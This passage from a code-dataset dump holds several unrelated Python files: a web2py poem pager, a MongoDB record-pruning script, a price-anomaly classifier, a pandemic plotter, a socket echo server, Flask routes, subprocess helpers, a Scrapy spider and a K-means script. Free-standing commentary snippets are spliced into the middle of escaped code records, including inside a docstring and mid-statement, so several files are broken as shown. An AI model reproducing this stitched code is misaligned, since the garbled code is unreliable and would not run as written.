'intro_hanzi', 'intro_en']}\n fields = [\n db.poem.chapter,\n db.poem.published,\n db.poem.intro_hanzi,\n db.poem.intro_en]\n maxtextlengths = {'poem.published': 50}\n onupdate = lambda form: decache(int(form.vars.chapter), db)\n db.poem.published.represent = lambda value, row: value.strftime(date_format)\n db.poem.chapter.requires = IS_IN_SET(range(1, 82), zero=None)\n grid = SQLFORM.grid(\n db.poem,\n createargs=createargs,\n csv=False,\n deletable=deletable,\n details=False,\n editargs=editargs,\n fields=fields,\n maxtextlengths=maxtextlengths,\n oncreate=onupdate,\n onupdate=onupdate,\n orderby=db.poem.chapter,\n paginate=None,\n searchable=False,\n viewargs=viewargs)\n return grid\n\ndef index(page_number, db):\n \"\"\" Return a row DIV of a page of poems. \"\"\"\n low, high = chapter_range(page_number)\n qry = ((db.poem.chapter>=low) & (db.poem.chapter<=high))\n thumbs = []\n for row in db(qry).select(orderby=db.poem.chapter):\n thumbs.append(_thumb(row, index_class))\n return DIV(thumbs, _class='row display-flex')\n\ndef links(poem, db):\n \"\"\" Return a row DIV of prev/next poems. \"\"\"\n thumbs = []\n\n # Next.\n qry = db.poem.chapter > poem.chapter\n nxt = db(qry).select(limitby=(0,1), orderby=db.poem.chapter)\n if not nxt:\n qry = db.poem.chapter >= 1\n nxt = db(qry).select(limitby=(0,1), orderby=db.poem.chapter)\n if nxt: \n thumbs.append(_thumb(nxt.first(), poem_class, 'Next'))\n\n # Previous.\n qry = db.poem.chapter < poem.chapter\n prev = db(qry).select(limitby=(0,1), orderby=~db.poem.chapter)\n if not prev:\n qry = db.poem.chapter <= 81\n prev = db(qry).select(limitby=(0,1), orderby=~db.poem.chapter)\n if prev:\n thumbs.append(_thumb(prev.first(), poem_class, 'Previous'))\n\n # Bootstrap.\n return DIV(\n thumbs,\n _class='row',\n _style='padding-top: 2.5em;')\n\ndef pager(db):\n \"\"\" Return a row DIV for a pager. 
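
# The page lookup in decache(), page = (chapter + 8) / 9, yields a float under
# Python 3 and only lands on the right cache key because '%d' truncates it. An
# explicit integer ceiling division states the intent (9 chapters per page,
# matching chapter_range above) and behaves identically on both Python versions:
def page_for_chapter(chapter):
    return (chapter + 8) // 9

assert page_for_chapter(1) == 1 and page_for_chapter(9) == 1 and page_for_chapter(10) == 2
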
\"\"\"\n from gluon import current\n\n # Previous/current/next page.\n if current.request.args(0):\n current_page = int(current.request.args(0))\n else:\n current_page = 1\n prev_page = current_page - 1\n next_page = current_page + 1\n\n # List of LI.\n pages = []\n\n # Previous/left.\n li_class = ''\n href = URL('poems', 'page', args=[str(prev_page)])\n if prev_page < 1:\n li_class = 'disabled'\n href = '#'\n elif prev_page == 1:\n href = URL('poems', 'index')\n span = SPAN(xmlescape(u'\\u4e0a'), **{'_aria-hidden': 'true'})\n anchor = A(span, _href=href, **{'_aria-label': 'Previous'})\n pages.append(LI(anchor, _class=li_class, _title='Previous Page'))\n\n # Chapter range links.\n for page in range(1, 10):\n li_class = ''\n href = URL('poems', 'page', args=[str(page)])\n page_range = ['%d-%d' % (((page-1)*9)+1, page*9)]\n if page == 1:\n href = URL('poems', 'index')\n if page == current_page:\n li_class = 'active'\n page_range.append(SPAN('(current)', _class='sr-only'))\n anchor = A(page_range, _href=href)\n pages.append(LI(anchor, _class=li_class))\n\n # Next/right.\n li_class = ''\n href = URL('poems', 'page', args=[str(next_page)])\n if next_page > 9:\n li_class = 'disabled'\n href = '#'\n span = SPAN(xmlescape(u'\\u4e0b'), **{'_aria-hidden': 'true'})\n anchor = A(span, _href=href, **{'_aria-label': 'Next'})\n pages.append(LI(anchor, _class=li_class, _title='Next Page'))\n\n # Together.\n return UL(pages, _class='pagination')\n","sub_path":"modules/poems.py","file_name":"poems.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39402799","text":"# coding: utf-8\r\nimport time\r\nimport logging\r\nimport pymongo\r\nfrom bson.code import Code \r\n\r\nRECORDS_NUM = 20\r\nLOG_FILENAME = \"/data/play_records_clean/logs/%s.log\"\r\n\r\n#MONGODB_HOST = \"localhost\"\r\nMONGODB_HOST = \"223.99.188.90\"\r\nMONGODB_PORT = 27017\r\n\r\ndef user_keep_N(collection, api_key, num):\r\n for one in collection.find({\"apiKey\":api_key}).sort(\"viewTime\",pymongo.DESCENDING).skip(num):\r\n #print one\r\n logging.info(\"%s\"%(one))\r\n #db.history.remove({\"_id\":one['_id']})\r\n db.history.delete_one({\"_id\":one['_id']})\r\n\r\nif __name__ == \"__main__\": \r\n now_second = time.time()\r\n now_time = time.localtime(now_second) \r\n str_day = time.strftime(\"%Y%m%d\", now_time)\r\n log_filename = LOG_FILENAME%(str_day)\r\n logging.basicConfig(filename=log_filename, level=logging.INFO)\r\n \r\n str_now_time= time.strftime(\"%Y-%m-%d %H:%M:%S\", now_time)\r\n logging.info(\"start @ %s\" % (str_now_time))\r\n \r\n connection = pymongo.MongoClient(MONGODB_HOST, MONGODB_PORT)\r\n db = connection.pub \r\n \r\n db.apikey_collection.drop() \r\n map_function = Code(\"function () {\" \r\n \"emit(this.apiKey, {count:1});\" \r\n \"}\") \r\n \r\n reduce_function = Code(\"function (key, values) {\" \r\n \" var total = 0;\" \r\n \" for (var i = 0; i < values.length; i++) {\" \r\n \" total += values[i].count;\" \r\n \" }\" \r\n \" return {count:total};\" \r\n \"}\") \r\n apikey_collection = db.history.map_reduce(map_function, reduce_function, out=\"apikey_collection\")\r\n user_index = 0\r\n user_list = []\r\n for one_apikey in apikey_collection.find():\r\n #print (\"index=%d, apikey=[%s], value=[%s]\" % (user_index, one_apikey['_id'], one_apikey['value']))\r\n logging.info(\"index=%d, apikey=[%s], value=[%s]\" % (user_index, one_apikey['_id'], one_apikey['value']))\r\n user_list.append(one_apikey['_id'])\r\n user_index = 
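
# The per-apiKey tally above is built from a JavaScript map/reduce pair. The
# same count can be expressed with MongoDB's aggregation pipeline, which avoids
# server-side JS and the temporary output collection; a sketch against the same
# history collection:
pipeline = [{"$group": {"_id": "$apiKey", "count": {"$sum": 1}}}]
# for doc in db.history.aggregate(pipeline):
#     logging.info("apikey=[%s], count=%d" % (doc["_id"], doc["count"]))
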
user_index + 1\r\n \r\n for one_user in user_list:\r\n user_keep_N(db.history, one_user, RECORDS_NUM)\r\n \r\n now_second = time.time()\r\n now_time = time.localtime(now_second) \r\n str_now_time= time.strftime(\"%Y-%m-%d %H:%M:%S\", now_time)\r\n logging.info(\"end @ %s\" % (str_now_time))\r\n \r\n ","sub_path":"play_records_clean.py","file_name":"play_records_clean.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404392444","text":"from sklearn.metrics import f1_score\nfrom datetime import timedelta\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nfrom constants import CONSTANTS\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom sklearn import preprocessing\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import confusion_matrix\nimport os\n\n# lucknowlabels = [2,1,1,2,2,2,5,4,3,1,5,5,5,3,2,2,5,5,4,3,4,5,4,2,5,5,5,5,2,2,3,2,2,5,3,2,5,2]\n\nfrom retail import getcenter\nretailpriceserieslucknow = getcenter('LUCKNOW')\nfrom mandi import getmandi\nfrom mandi import mandipriceseries\nfrom mandi import mandiarrivalseries \n#why lucknow mandi\nmandipriceserieslucknow = getmandi('Lucknow',True)\nmandiarrivalserieslucknow = getmandi('Lucknow',False)\n\ncwd = os.getcwd()\n\ndef whiten(series):\n import scipy\n EigenValues, EigenVectors = np.linalg.eig(series.cov())\n D = [[0.0 for i in range(0, len(EigenValues))] for j in range(0, len(EigenValues))]\n for i in range(0, len(EigenValues)):\n D[i][i] = EigenValues[i]\n DInverse = np.linalg.matrix_power(D, -1)\n DInverseSqRoot = scipy.linalg.sqrtm(D)\n V = np.dot(np.dot(EigenVectors, DInverseSqRoot), EigenVectors.T)\n series = series.apply(lambda row: np.dot(V, row.T).T, axis=1)\n return series\n\ndef whiten_series_list(list):\n\tfor i in range(0,len(list)):\n\t\tmean = list[i].mean()\n\t\tlist[i] -= mean\n\ttemp = pd.DataFrame()\n\tfor i in range(0,len(list)):\n\t\ttemp[i] = list[i]\n\ttemp = whiten(temp)\n\tnewlist = [temp[i] for i in range(0,len(list))]\n\treturn newlist\n\ndef Normalise(arr):\n m = arr.mean()\n am = arr.min()\n aM = arr.max()\n arr -= m\n arr /= (aM - am)\n return arr\n\ndef adjust_anomaly_window(anomalies,series):\n\tfor i in range(0,len(anomalies)):\n\t\tanomaly_period = series[anomalies[0][i]:anomalies[1][i]]\n\t\tmid_date_index = anomaly_period[10:31].argmax()\n\t\t# print type(mid_date_index),mid_date_index\n\t\t# mid_date_index - timedelta(days=21)\n\t\tanomalies[0][i] = mid_date_index - timedelta(days=21)\n\t\tanomalies[1][i] = mid_date_index + timedelta(days=21)\n\t\tanomalies[0][i] = datetime.strftime(anomalies[0][i],'%Y-%m-%d')\n\t\tanomalies[1][i] = datetime.strftime(anomalies[1][i],'%Y-%m-%d')\n\treturn anomalies\n\ndef get_anomalies(path,series):\n\tanomalies = pd.read_csv(path, header=None, index_col=None)\n\tanomalies[0] = [ datetime.strftime(datetime.strptime(date, '%Y-%m-%d'),'%Y-%m-%d') for date in anomalies[0]]\n\tanomalies[1] = [ datetime.strftime(datetime.strptime(date, ' %Y-%m-%d'),'%Y-%m-%d') for date in anomalies[1]]\n\tanomalies = adjust_anomaly_window(anomalies,series)\n\treturn anomalies\n\ndef get_anomalies_year(anomalies):\n\tmid_date_labels=[]\n\tfor i in range(0,len(anomalies[0])):\n\t\tmid_date_labels.append(datetime.strftime(datetime.strptime(anomalies[0][i],'%Y-%m-%d')+timedelta(days=21),'%Y-%m-%d'))\n\treturn mid_date_labels\n\n# def newlabels(anomalies,oldlabels):\n# labels = []\n# k=0\n# for i in 
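
# For reference on whiten() above: with covariance C = E D E^T, the ZCA
# whitening map is V = E D^(-1/2) E^T, chosen so that cov(Vx) = I. Note the
# function builds V from scipy.linalg.sqrtm(D) rather than the inverse square
# root, which takes the square root of the covariance instead of removing it.
# A compact NumPy sketch of the standard form:
import numpy as np

def zca_whiten(X):
    # X: (n_samples, n_features), assumed mean-centred.
    C = np.cov(X, rowvar=False)
    vals, vecs = np.linalg.eigh(C)
    V = vecs @ np.diag(1.0 / np.sqrt(vals + 1e-8)) @ vecs.T
    return X @ V.T

X = np.random.randn(2000, 3) * np.array([1.0, 5.0, 0.5])
Xw = zca_whiten(X - X.mean(axis=0))
assert np.allclose(np.cov(Xw, rowvar=False), np.eye(3), atol=0.15)
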
range(0,len(anomalies)):\n# if(anomalies[2][i] != ' Normal_train'):\n# labels.append(oldlabels[k])\n# k = k+1\n# else:\n# labels.append(8)\n# return labels\n\ndef newlabels(anomalies):\n lucknowlabels = []\n for i in range(len(anomalies)):\n somestring = anomalies[2][i].strip().lower()\n if(somestring == 'transport' or somestring == 'fuel' or somestring == 'fuel hike' or somestring == 'strike'): #transport and fuel are related to each other\n lucknowlabels.append(1)\n elif(somestring == 'weather'):\n lucknowlabels.append(2)\n elif(somestring == 'inflation'):\n lucknowlabels.append(3)\n elif(somestring == 'hoarding'):\n lucknowlabels.append(4)\n elif(somestring == 'navratra'):\n lucknowlabels.append(5)\n else:\n lucknowlabels.append(8) #this is for the periods when tag is Normal_train\n return lucknowlabels\n\ndef prepare(anomalies,labels,priceserieslist):\n\tx = []\n\tfor i in range(0,len(anomalies)):\n\t\tp=[]\n\t\tfor j in range(0,len(priceserieslist)):\n\t\t\t# p += (Normalise(np.array(priceserieslist[j][anomalies[0][i]:anomalies[1][i]].tolist()))).tolist()\n\t\t\tp += ((np.array(priceserieslist[j][anomalies[0][i]:anomalies[1][i]].tolist()))).tolist()\n\n\t\t\t# if(i==0):\n\t\t\t# \tprint anomalies[0][i], anomalies[1][i]\n\t\tx.append(np.array(p))\n\treturn np.array(x),np.array(labels)\t\t\n\ndef getKey(item):\n\treturn item[0]\n\ndef partition(xseries,yseries,year,months):\n\tcombined_series = zip(year,xseries,yseries)\n\tcombined_series = sorted(combined_series,key=getKey)\n\ttrain = []\n\ttrain_labels = []\n\tfixed = datetime.strptime('2006-01-01','%Y-%m-%d')\n\ti=0\n\twhile(fixed < datetime.strptime('2017-11-01','%Y-%m-%d')):\n\t\tcurrx=[]\n\t\tcurry=[]\n\t\tfor anomaly in combined_series:\n\t\t\ti += 1\n\t\t\tif(datetime.strptime(anomaly[0],'%Y-%m-%d') > fixed and datetime.strptime(anomaly[0],'%Y-%m-%d')- fixed <= timedelta(days=months*30)):\n\t\t\t\tcurrx.append(anomaly[1])\n\t\t\t\tcurry.append(anomaly[2])\n\t\ttrain.append(currx)\n\t\ttrain_labels.append(curry)\n\t\tfixed = fixed +timedelta(days = months*30)\n\treturn np.array(train),np.array(train_labels)\n\ndef get_score(xtrain,xtest,ytrain,ytest):\n\tscaler = preprocessing.StandardScaler().fit(xtrain)\n\txtrain = scaler.transform(xtrain)\n\txtest = scaler.transform(xtest)\n\tmodel = RandomForestClassifier(max_depth=3, random_state=0)\n\tmodel.fit(xtrain,ytrain)\n\ttest_pred = np.array(model.predict(xtest))\n\treturn test_pred\n\ndef train_test_function(align_l, data_l):\n\tanomalieslucknow = get_anomalies('data/anomaly/normal_h_w_lucknow.csv',align_l)\n\tlucknowlabelsnew = newlabels(anomalieslucknow)\n\t# lucknowlabelsnew = getlabels(anomalieslucknow)\n\tlucknow_anomalies_year = get_anomalies_year(anomalieslucknow)\n\tx,y = prepare(anomalieslucknow,lucknowlabelsnew,data_l)\n\txall = np.array(x.tolist())\n\tyall = np.array(y.tolist())\n\txall_new =[]\n\tyall_new = []\n\tyearall_new = []\n\tyearall = np.array(lucknow_anomalies_year)\n\n\tfor y in range(0,len(yall)):\n\t\tif( yall[y] == 2 or yall[y]==3 or yall[y]==5 or yall[y] == 1 or yall[y] == 4):\n\t\t\txall_new.append(xall[y])\n\t\t\tyall_new.append(1)\n\t\t\tyearall_new.append(yearall[y])\n\t\telif (yall[y] == 8):\n\t\t\txall_new.append(xall[y])\n\t\t\tyall_new.append(0)\n\t\t\tyearall_new.append(yearall[y])\n\n\tassert(len(xall_new) == len(yearall_new))\n\ttotal_data, total_labels = partition(xall_new,yall_new,yearall_new,6)\n\tpredicted = []\n\tactual_labels = []\n\tfor i in range(0,len(total_data)):\n\t\tif( len(total_data[i]) != 0):\t\n\t\t\ttest_split = 
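
# get_score() above hand-rolls the fit-scaler-on-train, transform-test pattern.
# sklearn's Pipeline packages the same flow so the scaler can never leak test
# statistics; a sketch with toy data (shapes illustrative, and note the scaler
# is a no-op for tree models -- it is kept only to mirror the original):
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestClassifier
import numpy as np

clf = make_pipeline(StandardScaler(), RandomForestClassifier(max_depth=3, random_state=0))
X = np.random.randn(40, 6)
y = (X[:, 0] > 0).astype(int)
clf.fit(X[:30], y[:30])
pred = clf.predict(X[30:])
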
total_data[i]\n\t\t\ttest_labels = total_labels[i]\n\t\t\tactual_labels = actual_labels + test_labels\n\t\t\ttrain_split = []\n\t\t\ttrain_labels_split = []\n\t\t\tfor j in range(0,len(total_data)):\n\t\t\t\tif( j != i):\n\t\t\t\t\ttrain_split = train_split + total_data[j]\n\t\t\t\t\ttrain_labels_split = train_labels_split+total_labels[j]\n\t\t\tpred_test = get_score(train_split,test_split,train_labels_split,test_labels)\t\n\t\t\tpredicted = predicted + pred_test.tolist()\n\tpredicted = np.array(predicted)\n\tactual_labels = np.array(actual_labels)\n\tprint (sum(predicted == actual_labels) * 100.0)/len(predicted)\n\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[mandipriceserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow,mandipriceserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow-mandipriceserieslucknow,mandiarrivalserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow-mandipriceserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow,mandiarrivalserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow,mandipriceserieslucknow,mandiarrivalserieslucknow])\ntrain_test_function(mandipriceserieslucknow,[retailpriceserieslucknow/mandipriceserieslucknow])\n","sub_path":"crawler/step1_binary.py","file_name":"step1_binary.py","file_ext":"py","file_size_in_byte":7653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61638657","text":"# Name: Tahseen Bin Taj\n\nimport doctest, datetime, numpy\nimport matplotlib.pyplot as plt\n\ndef date_diff(d1, d2):\n '''\n (str), (str) -> (int)\n Takes two datetime.date objects as inputs and finds the difference\n in days between them.\n >>> date_diff('2019-10-31', '2019-11-2')\n 2\n '''\n d1 = str_to_date(d1)\n d2 = str_to_date(d2)\n return (d2 - d1).days\n\n\ndef get_age(d1, d2):\n '''\n (str), (str) -> (int)\n Takes two datetime.date objects as inputs and finds the age of the patient\n using it in years.\n >>> get_age('2018-10-31', '2019-11-2')\n 1\n >>> get_age('2018-10-31', '2000-11-2')\n -17\n '''\n a_year = 365.2425\n return int(date_diff(d1, d2)/a_year)\n\ndef str_to_date(d):\n '''\n (str) -> (datetime.date)\n Takes a string as an input and returns it in datetime.date format.\n >>> str_to_date('2019-11-2')\n datetime.date(2019, 11, 2)\n >>> str_to_date('2018-10-31')\n datetime.date(2018, 10, 31)\n '''\n d = d.split('-')\n date = datetime.date(int(d[0]), int(d[1]), int(d[2]))\n return date\n\n\ndef stage_three(input_filename, output_filename):\n \"\"\"\n (str), (str) -> (dict)\n Takes two filenames as inputs and returns a dictionary with days in pandemic\n as keys and I, H, R as subkeys with their counts as values.\n >>> stage_three('stage2.tsv', 'stage3.tsv')\n {0: {'I': 1, 'D': 0, 'R': 0}, 1: {'I': 3, 'D': 0, 'R': 0}, \\\n2: {'I': 8, 'D': 0, 'R': 0}, 3: {'I': 20, 'D': 0, 'R': 0}, \\\n4: {'I': 47, 'D': 2, 'R': 0}, 5: {'I': 107, 'D': 11, 'R': 0}, \\\n6: {'I': 259, 'D': 20, 'R': 0}, 7: {'I': 621, 'D': 55, 'R': 1}, \\\n8: {'I': 1524, 'D': 113, 'R': 0}, 9: {'I': 197, 'D': 10, 'R': 1}}\n \"\"\"\n in_file = open(input_filename, 'r', encoding = 'utf-8')\n out_file = open(output_filename, 'w', encoding = 'utf=8')\n count = 0\n ret = {}\n for line in in_file:\n edited = line.split('\\t')\n if count == 0:\n i_date = edited[2]\n count += 1\n edited[2] = str(date_diff(i_date, 
edited[2]))\n edited[3] = str(get_age(edited[3], i_date))\n if edited[6][0].upper() in 'IDR':\n edited[6] = edited[6][0].upper()\n else:\n edited[6] = 'D'\n if int(edited[2]) not in ret:\n ret[int(edited[2])] = dict.fromkeys(['I', 'D', 'R'], 0)\n ret[int(edited[2])][edited[6]] += 1\n edited = '\\t'.join(edited)\n out_file.write(edited)\n in_file.close()\n out_file.close()\n return ret\n\ndef plot_time_series(d):\n '''\n (dict) -> (list of lists)\n Takes a dictionary as input and returns a list of lists containing\n the count of I, D and R.\n '''\n ret_list = []\n for key in d:\n temp = []\n temp.append(d[key]['I'])\n temp.append(d[key]['R'])\n temp.append(d[key]['D'])\n ret_list.append(temp)\n plt.plot(ret_list)\n plt.legend(['Infected', 'Recovered', 'Dead'])\n plt.title('Time series of early pandemic, by Tahseen Bin Taj')\n plt.xlabel('Days into Pandemic')\n plt.ylabel('Number of People')\n plt.savefig('time_series.png')\n return ret_list\n \nif __name__ == '__main__':\n doctest.testmod()\n","sub_path":"time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"122877949","text":"# coding:utf-8\n# web address : http://pymotw.com/2/socket/tcp.html\n\nfrom __future__ import print_function\nimport socket\nimport sys\n\nfrom common_func import warning\n\n# create a socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# bind the socket to a port\n# empty string means any ip address\nbind_address = ('', 10000)\nsock.bind(bind_address)\n\n# Listening for incoming connections\nsock.listen(1)\nwhile True:\n warning(\"waiting for a connection\")\n connection, client_address = sock.accept()\n try:\n warning(\"connection from \" + client_address[0] + \"port : \" + str(client_address[1]))\n\n #receive the data and return the data\n while True:\n data = connection.recv(16)\n warning(\"received: \" + data.decode('utf-8'))\n if data:\n warning(\"send data back to client\")\n connection.sendall(data)\n else:\n warning(\"no more data anymore\")\n break\n finally:\n connection.close()\n","sub_path":"demo/socket_demo/socket_single_thread_server.py","file_name":"socket_single_thread_server.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"21360485","text":"from flask import render_template, flash, redirect, url_for\nfrom . import dashboard\nfrom flask_login import login_required, current_user\nfrom .. 
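
# A matching client for the echo server above: it connects on port 10000, sends
# one message, then reads the echo back in the same 16-byte chunks the server
# uses. Standalone sketch over the standard library only:
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('localhost', 10000))
try:
    message = b'This is the message.'
    sock.sendall(message)
    received = b''
    while len(received) < len(message):
        received += sock.recv(16)
    print('received: ' + received.decode('utf-8'))
finally:
    sock.close()
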
import db\nfrom ..models import User, Country, Airport, CarryListing\nfrom .forms import CarryForm\n\n\n\n\n@dashboard.route('/')\n@login_required\ndef index():\n user = current_user\n return render_template('dashboard/index.html', user=user)\n\n \n@dashboard.route('/newcarry', methods=['GET', 'POST'])\n@login_required\ndef new_carry():\n form = CarryForm()\n if form.validate_on_submit():\n carry_list = CarryListing(from_country=form.from_country.data,\n to_country=form.to_country.data,\n from_airport=form.from_airport.data,\n to_airport=form.to_airport.data,\n additional_info=form.additional_info.data,\n flight_date=form.flight_date.data,\n user=current_user)\n db.create_all()\n db.session.add(carry_list)\n db.session.commit()\n flash('Your listing was added successfully.')\n return redirect(url_for('.index'))\n return render_template('dashboard/newcarry.html', form=form)","sub_path":"venv/app/dashboard/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"651065779","text":"import subprocess\nimport os\nimport datetime\nimport time\n\ndef createSubprocess(cmd,pipeStdout=True,checkRetcode=True):\n\t\"\"\"\n\tFunction : Creates a subprocess via a call to subprocess.Popen with the argument 'shell=True', and pipes stdout and stderr. Stderr is always piped, but stdout can be turned off.\n If the argument checkRetcode is True, which it is by defualt, then for any non-zero return code, an Exception is\n\t\t\t\t\t\t raised that will print out the the command, stdout, stderr, and the returncode when not caught. Otherwise, the Popen instance will be return, in which case the caller must \n\t\t\t\t\t call the instance's communicate() method (and not it's wait() method!!) in order to get the return code to see if the command was a success. communicate() will return \n\t\t\t\t\t\t a tuple containing (stdout, stderr). But at that point, you can then check the return code with Popen instance's 'returncode' attribute.\n\tArgs : cmd - str. The command line for the subprocess wrapped in the subprocess.Popen instance. If given, will be printed to stdout when there is an error in the subprocess.\n\t\t\t\t\t\t pipeStdout - bool. True means to pipe stdout of the subprocess.\n\t\t\t\t\t\t checkRetcode - bool. See documentation in the description above for specifics.\n\tReturns : A two-item tuple containing stdout and stderr, respectively.\n\t\"\"\"\n\tstdout = None\n\tif pipeStdout:\n\t\tstdout = subprocess.PIPE\n\t\tstderr = subprocess.PIPE\n\tpopen = subprocess.Popen(cmd,shell=True,stdout=stdout,stderr=subprocess.PIPE)\n\tif checkRetcode:\n\t\tstdout,stderr = popen.communicate()\n\t\tif not stdout: #will be None if not piped\n\t\t\tstdout = \"\"\n\t\tstdout = stdout.strip()\n\t\tstderr = stderr.strip()\n\t\tretcode = popen.returncode\n\t\tif retcode:\n\t\t\t#below, I'd like to raise a subprocess.SubprocessError, but that doens't exist until Python 3.3.\n\t\t\traise Exception(\"subprocess command '{cmd}' failed with returncode '{returncode}'.\\n\\nstdout is: '{stdout}'.\\n\\nstderr is: '{stderr}'.\".format(cmd=cmd,returncode=retcode,stdout=stdout,stderr=stderr))\n\t\treturn stdout,stderr\n\telse:\n\t\treturn popen\n\n\ndef getFileAgeMinutes(infile):\n\t\"\"\" \n\tFunction : Calculates the age of a file in hours. 
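
# Usage sketch for createSubprocess() above in its non-checking mode: the
# caller receives the Popen object and, per the docstring, must use
# communicate() rather than wait() before inspecting returncode. The command
# string here is illustrative only.
popen = createSubprocess("ls -l /tmp", checkRetcode=False)
stdout, stderr = popen.communicate()
if popen.returncode != 0:
    print("command failed: {stderr}".format(stderr=stderr))
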
Partial hours are always rounded down a whole number.\n\t\t\t\t\t Raises an IOError of the input file doens't exist.\n\t\"\"\"\n\tif not os.path.exists(infile):\n\t\traise IOError(\"Can't check age of non-existant file '{infile}'\".format(infile=infile))\n\tmtime = datetime.datetime.fromtimestamp(os.path.getmtime(infile))\n\tnow = datetime.datetime.now()\n\tdiff = now - mtime\n\tseconds = diff.total_seconds()\n\tminutes = seconds/60\n\treturn minutes\n\ndef getCurTime():\n\tepochTime = time.time()\n\tt = datetime.datetime.fromtimestamp(epochTime)\n\treturn \"{year}-{month}-{day}.{hour}.{minute}.{second}\".format(year=t.year,month=t.month,day=t.day,hour=t.hour,minute=t.minute,second=t.second)\n","sub_path":"gbsc_utils.py","file_name":"gbsc_utils.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"477565237","text":"\nimport scrapy\n\n\nclass LeboncoinSpider(scrapy.Spider):\n name = \"leboncoin\"\n\n def start_requests(self):\n urls = [\n 'https://www.leboncoin.fr/recherche/?text=Velo%20babboe',\n 'https://www.leboncoin.fr/recherche/?text=Velo%20yuba',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n for ad in response.css('li[data-qa-id=\"aditem_container\"]'):\n yield {\n 'title': ad.css('span[data-qa-id=\"aditem_title\"]::text').get().strip(),\n 'description': '',\n 'price': ad.css('div[data-qa-id=\"aditem_price\"] span span[itemprop=\"priceCurrency\"]::text').get().replace(\" \", \"\").replace(\"€\", \"\").strip(),\n 'location': ad.css('p[data-qa-id=\"aditem_location\"]::text').get().strip(),\n 'source': 'leboncoin',\n }\n","sub_path":"scrapper/spiders/leboncoin_spider.py","file_name":"leboncoin_spider.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18923554","text":"\r\nfrom copy import deepcopy\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nplt.rcParams['figure.figsize'] = (16, 9)\r\nplt.style.use('ggplot')\r\n\r\n#importing datasets\r\n\r\nfrom sklearn.externals import joblib\r\ndata = joblib.load('C:\\\\Users\\\\pradi\\\\Documents\\\\Avantika\\\\Cloudera\\\\cloudera-quickstart-vm-5.13.0-0-virtualbox\\\\cloudera-quickstart-vm-5.13.0-0-virtualbox\\\\2016-06-20-0001Z.json')\r\n\r\ndef clustering(data):\r\n# data = pd.read_csv('airplane')#change when data is received\r\n# print(data.shape)\r\n# print data.head(10)\r\n \r\n #Value plotting\r\n pt1 = data.Spd.head(10000)\r\n pt2 = data.Alt.head(10000)\r\n x = np.array(list(zip(pt1, pt2)))\r\n# x = pd.DataFrame(pt1.head(10000), pt2.head(10000))\r\n print(x)\r\n plt.scatter(pt1, pt2, c='black', s=7)\r\n \r\n #Calculating distance for updating centroid\r\n def dist(a, b, ax=1):\r\n return np.linalg.norm(a - b, axis=ax)\r\n \r\n # Number of clusters\r\n number = 2\r\n # X coordinates of random centroids\r\n x_coord = np.random.randint(0, np.max(pt1)-20, size=number)\r\n # Y coordinates of random centroids\r\n y_coord = np.random.randint(0, np.max(pt2)-20, size=number)\r\n C = np.array(list(zip(x_coord, y_coord)), dtype=np.float32)\r\n print(C)\r\n # To store the value of centroids when it updates\r\n old = np.zeros(C.shape)\r\n # Cluster Lables(0, 1, 2)\r\n clusters = np.zeros(len(x))\r\n # Error func. 
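
# The point-by-point assignment loop in the surrounding K-means script can be
# vectorised with broadcasting, the usual NumPy idiom for this step. A sketch,
# assuming x is (n, 2) and C is (k, 2) as in the script:
import numpy as np

def assign_clusters(x, C):
    # distances has shape (n, k): each point against each centroid.
    distances = np.linalg.norm(x[:, None, :] - C[None, :, :], axis=2)
    return np.argmin(distances, axis=1)

labels = assign_clusters(np.random.rand(100, 2), np.random.rand(3, 2))
assert labels.shape == (100,)
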
- Distance between new centroids and old centroids\r\n error = dist(C, old, None)\r\n # Loop will run till the error becomes zero\r\n while error != 0:\r\n print(error)\r\n # Assigning each value to its closest cluster\r\n for i in range(len(x)):\r\n distances = dist(x[i], C)\r\n cluster = np.argmin(distances)\r\n clusters[i] = cluster\r\n # Storing the old centroid values\r\n old = deepcopy(C)\r\n # Finding the new centroids by taking the average value\r\n for i in range(number):\r\n points = [x[j] for j in range(len(x)) if clusters[j] == i]\r\n C[i] = np.mean(points, axis=0)\r\n error = dist(C, old, None)\r\n \r\n plt.scatter(C[0], C[1])\r\nplt.show()","sub_path":"K-Means Clustering.py","file_name":"K-Means Clustering.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"127483012","text":"## Python application that gives visual of covid infection in Nepal. \n## Disclaimer: This is based on fake data. 